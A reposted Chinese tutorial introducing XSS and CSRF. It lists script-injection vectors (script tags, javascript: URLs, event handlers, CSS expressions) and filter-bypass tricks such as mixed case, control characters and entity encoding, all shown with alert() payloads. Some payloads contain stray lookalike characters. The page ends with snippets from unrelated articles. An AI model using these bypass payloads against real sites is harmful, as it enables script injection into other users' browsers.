Xss Csrf 简介

一、Js在web的执行环境

1.直接触发

•在HTML页中插入<script></script>脚本标记。JS嵌入到HTML中的两种方式:
•1)直接嵌入<script>标签

 <script language=“javascript”>

 document.write(“hello world!”);

 </script>

•2)在外部以js文件的形式嵌入

<script language=“javascript” src=“test.js”>

</script>

2.利用HTML标签属性触发

•利用HTML标签中能够访问文件的属性来执行JS代码。JS中包含一个URL伪协议,可以使用javascript:加上任意JS代码来表示一个URL,浏览器装载此URL时,JS被执行。

< img src=“javascript:alert(‘XSS’)” />

< img dynsrc=“javascript:alert(‘XSS’)” />

 

3.•利用HTML事件触发
•HTML标签中定义了一系列事件。

<img src=“#” οnerrοr=“alert(‘XSS’)” />

<img onClick =“alert(‘XSS’)” />

4•利用CSS触发
lCSS嵌入HTML中的三种方式:

1)以.css文件的形式:

<link href=“test.css” rel=“stylesheet” type=“text/css”/>

2)以<style></style>标签的方式:

< style type="text/javascript">alert('XSS');</ style > 

3)在标签中以style属性的方式。

<a style ="background-image: url(javascript:alert('XSS'))">  </a>

5•其他
IE支持在CSS中使用expression,用来把CSS和JS结合起来,即CSS后跟一段JS代码,CSS属性的值等于JS代码的执行结果:

<style>

h1{color:#CCC;height:expression(alert(‘xss’));}

</style>

二、Xss的介绍

三、XSS挖掘技巧

•过滤规则:1.关键字过滤:如:javascript等;2.<>等特殊字符转码。
1.但是HTML并不遵循XHTML标准,所以可以将HTML标签属性值大小写、混合写,而且标签属性可以单引号、双引号,也可以不用引号:如:

    <img src=“javascript:alert(‘XSS’)” />

    写为<img src=“JavasCripT:alert(‘XSS’)” />可绕过过滤规则

2.插入控制符的ASCII码混淆,不影响原代码的执行。如tab(&#9)、换行符号(&#10)、回车符(&#13)等31个控制字符。

     如: <img src=“javascript:alert(‘XSS’)” />,混淆后代码为:

         <img src=“&#15;javascript:alert(‘XSS’)” />

3. 绕过HTML标签内的关键字过滤,在插入代码的属性前加入混淆属性,如: <img src=“abc>” οnclick=“alert(‘XSS’)” />

4. 插入注释符如: <img style=“xss:expr/*xss*/ession(alert(111))”>

5.对CSS:\会被浏览器忽略: : <img style=“background-image:url(ja\vas\\\\cript:alert(111))”>

6.编码绕过,如: <img src=“&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#4l&#59”>等价于<img src=“javascript:alert(‘xss’;)”.>

      http://ha.ckers.org/xss.html

四、防XSS

五、跨站请求伪造(CSRF)
某些浏览器允许跨域携带cookies。如:
在a.com访问b.com时,会携带B.com的cookies
例如火狐浏览器

转载于:https://www.cnblogs.com/sohold/archive/2013/01/07/2848769.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/260109.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Cracking the Coding Interview 5.2

Given a(decimal -e.g. 3.72)number that is passed in as a string, print the binary representation. If the number can not be represented accurately in binary, print "ERROR" 整数部分&#xff1a; 对2取余&#xff0c;然后向右移动一位&#xff0c;重复直到…

python的render函数_带函数return的Flask render_模板

TL&#xff1b;DR在这种情况下&#xff0c;我想我会选择使用我现在的4个选项我将介绍4种选择&#xff0c;其中一些可能比其他更可行。在如果您担心execute表示的代码存在代码重复(DRY)&#xff0c;您可以简单地定义一个两个路由都可以调用的函数&#xff1a;def execute():# ex…

Google开源Leak Finder——用于检测内存泄漏的JavaScript工具

近日&#xff0c;Google开源了Leak Finder&#xff0c;这款工具可以查看JavaScript应用的堆&#xff0c;进而发现内存泄漏。 作为一门垃圾收集语言&#xff0c;JavaScript并不会出现常见的内存泄露情况&#xff0c;特别是像C等语言中所见到的那种。但如果依旧将内存分配给那些不…

linux 定时访问文件夹,Linux定时同步文件夹

-v, --verbose 详细模式输出-q, --quiet 精简输出模式-c, --checksum 打开校验开关&#xff0c;强制对文件传输进行校验-a, --archive 归档模式&#xff0c;表示以递归方式传输文件&#xff0c;并保持所有文件属性&#xff0c;等于-rlptgoD-r, --recursive 对子目录以递归模式处…

windows apache 开启 GZIP

从服务端优化来说&#xff0c;通过对服务端做压缩配置可以大大减小文本文件的体积&#xff0c;从而使加载文本的速度成倍的加快。目前比较通用的压缩方法是启用gzip压缩。它 会把浏览器请求的页面&#xff0c;以及页面中引用的静态资源以压缩包的形式发送到客户端,然后在客户端…

python必备插件_5框酷毙的python插件工具

展开全部工欲善其事必先利其器&#xff0c;一个好的工具能让起到事半功倍32313133353236313431303231363533e59b9ee7ad9431333433646531的效果&#xff0c;Python社区提供了足够多的优秀工具来帮助开发者更方便的实现某些想法&#xff0c;下面这几个工具给我的工作也带来了很多…

Bootstrap3 排版-改变大小写

通过这几个类可以改变文本的大小写。 <p class"text-lowercase">Lowercased text.</p> <p class"text-uppercase">Uppercased text.</p> <p class"text-capitalize">Capitalized text.</p> —–下面有个“顶…

linux系统如何调屏幕亮度,Linux入门教程:Ubuntu笔记本屏幕亮度调节

前天入手一台Dell笔记本&#xff0c;i7第五代处理器&#xff0c;8G内存&#xff0c;1T硬盘&#xff0c;很符合我对移动工作站的要求。今天果断将正版win8替换为Ubuntu&#xff0c;DIY的后果就是原来3秒启动系统变成了现在15秒&#xff0c;忍了。但是另一个问题十分困扰我&#…

Centos7 更新pip和scipy

更新pip&#xff1a; pip install --upgrade pip 更新scipy包&#xff1a; pip install -upgrade scipy 转载于:https://www.cnblogs.com/leewhite/p/6098211.html

poj 3258 River Hopscotch 【二分】

题目真是不好读&#xff0c;大意例如以下&#xff08;知道题意就非常好解了&#xff09; 大致题意&#xff1a; 一条河长度为 L&#xff0c;河的起点(Start)和终点(End)分别有2块石头&#xff0c;S到E的距离就是L。 河中有n块石头&#xff0c;每块石头到S都有唯一的距离 问如今…

python的socks5全局代理_Python写的Socks5协议代理服务器

直接上代码&#xff1a;#!/usr/bin/python# Filename s5.py# Python Dynamic Socks5 Proxy# Usage: python s5.py 1080# Background Run: nohup python s5.py 1080 &import socket, sys, select, SocketServer, struct, timeclass ThreadingTCPServer(SocketServer.Threadi…

Zencart 给DHL运费模块增加一个分区的方法

Zencart 给DHL运费模块增加一个分区的方法 zencart給DHL運費模塊添加一個分區的方法很簡單&#xff0c;因爲該模塊已經做好了允許用戶添加更多分區的設置。 具體方法如下&#xff1a; 首先打開該運費模塊&#xff08;includes\modules\shipping\dhlzones.php 文件&#xff09;&…

linux 如何查看终端格式,你应该还不知道,Linux终端下的 Markdown 文档查看器

原标题&#xff1a;你应该还不知道&#xff0c;Linux终端下的 Markdown 文档查看器现在&#xff0c;Markdown 差不多已经成为技术文档的标准。它可以实现技术文档的快捷写作&#xff0c;以及输出发布。同样都是标记语言&#xff0c;但Markdown 文档相比HTML更加简单。一是体现在…

更换硬盘

更换硬盘 1. 根据管理平台的信息&#xff0c;找到损坏磁盘的位置 2. 取下坏盘&#xff0c;对比新盘的PN号 3. 将新的硬盘插回到磁盘柜 4. vol status -s 查看Spare Disks信息 &#xff0c;找到识别码&#xff0c;例如4a.05.15 5. disk assign 4…

Android之 Fragment

什么是Fragment&#xff1a; Android是在Android 3.0 (API level 11)开始引入Fragment的。 可以把Fragment想成Activity中的模块&#xff0c;这个模块有自己的布局&#xff0c;有自己的生命周期&#xff0c;单独处理自己的输入&#xff0c;在Activity运行的时候可以加载或者移除…

怎么用python检索法律_法律人,你的检索与处理信息的方式,决定了你的专业程度...

昨天在后台收到一位读者留言&#xff1a;“我花了2天时间到各法院官网、法律数据库网站、裁判文书及判例网站上搜索近十年我国经济类犯罪案例。好不容易将案件手动分类&#xff0c;整理判例的定罪和量刑情况给当前的案子作参考&#xff0c;现在看到了结论&#xff0c;也不敢确定…

HDU1753: 大明A+B

大明AB Time Limit: 3000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others) Total Submission(s): 5533 Accepted Submission(s): 1870 Problem Description话说&#xff0c;经过了漫长的一个多月&#xff0c;小明已经成长了许多&#xff0c;所以他改了…

倒戈了,转投简书 --------

深情自白 还记得数月前那个月黑风高的晚上&#xff0c;笔主偶遇简书&#xff0c;被那婀娜多姿的Markdown输出深深吸引不能自拔&#xff0c;从此立下毒誓要两边同时发布。然而天有不测风云&#xff08;这边的太丑&#xff09;&#xff0c;前思后想寝食难安之后作出决定&#xff…

如何通过windows控制linux,如何从Windows远程控制Linux | MOS86

ifconfig将显示您需要连接的IP地址。 如果Linux盒具有以太网连接&#xff0c;则该地址将在eth0旁边列出。 如果以无线方式连接&#xff0c;请查找针对wlan0列出的IP地址。如果这不容易或不方便&#xff0c;则有另一种方法几乎同样简单。 在浏览器窗口中&#xff0c;连接到路由器…

简明Vim练级攻略(初学者)

http://blog.jobbole.com/18339/转载于:https://www.cnblogs.com/sherry00/p/3931023.html